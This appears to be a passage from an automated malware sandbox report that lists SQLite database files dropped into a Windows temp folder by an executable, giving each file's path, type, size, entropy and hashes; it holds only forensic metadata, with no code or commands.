SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7VU9H7YZKc

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ZM62vKokH

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7pmvuRJSq8

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7uPxAYqEJu

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8RQK1aDBdJ

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8bow8ajICu

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\90YnqVS141

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\96QA0sXOX6

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\97vG7ZJfCz

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9R16GLpZcZ

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AUXEQDby9B

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AomSgvASrh

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B4RFcMEvKM

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B539ZCGK8a

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B8GxsJrYqi

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B8oPlr3jQ0

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BBaiZ8qPDr

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BHCsS4Tcvp

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BWabNtZWRM

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CAet0Eq64K

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CXDve81O32

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CdrHKSyFQn

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CwsqLVdzqS

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DCMHnLHIz7

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DGEQpREgU2

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DOZALIe7mA

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
